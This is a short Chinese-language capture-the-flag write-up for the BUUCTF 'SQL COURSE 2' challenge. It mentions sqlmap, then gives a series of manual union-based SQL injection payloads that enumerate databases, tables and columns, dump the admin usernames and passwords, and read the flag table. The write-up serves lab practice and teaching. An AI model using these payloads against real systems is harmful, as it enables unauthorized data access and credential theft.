BUU SQL COURSE 2

BUU SQL COURSE 2

BUU SQL COURSE 2

sqlmap

和前面那题差不多，但是注一下找到的

登录成功但是显示 fault。

注一下别的看一下，在另一个数据库里找到了 flag。

手动注入

?id=1 and 1 = 1 

正常回显，

?id=1 and 1 = 2

无回显，说明存在注入点。

中间流程和上一题相同。

?id=0 union select '',(select group_concat(schema_name) from information_schema.schemata)

打出数据库名，

?id=0 union select '',(select group_concat(table_name) from information_schema.tables where table_schema = 'news')

打 news 库，

?id=0 union select '',(select group_concat(column_name) from information_schema.columns where table_schema = 'news' and table_name = 'admin')

打 admin 表，

?id=0 union select '',(select group_concat(username) from admin)
?id=0 union select '',(select group_concat(password) from admin)

打 username 和 password。

登录一下发现登录成功但是提示 fault。

试一下打别的数据库，在 ctrtraining 库里找到一个名为 flag 的表。

?id=0 union select '',(select group_concat(flag) from ctftraining.flag)

查一下这个表，得到 flag。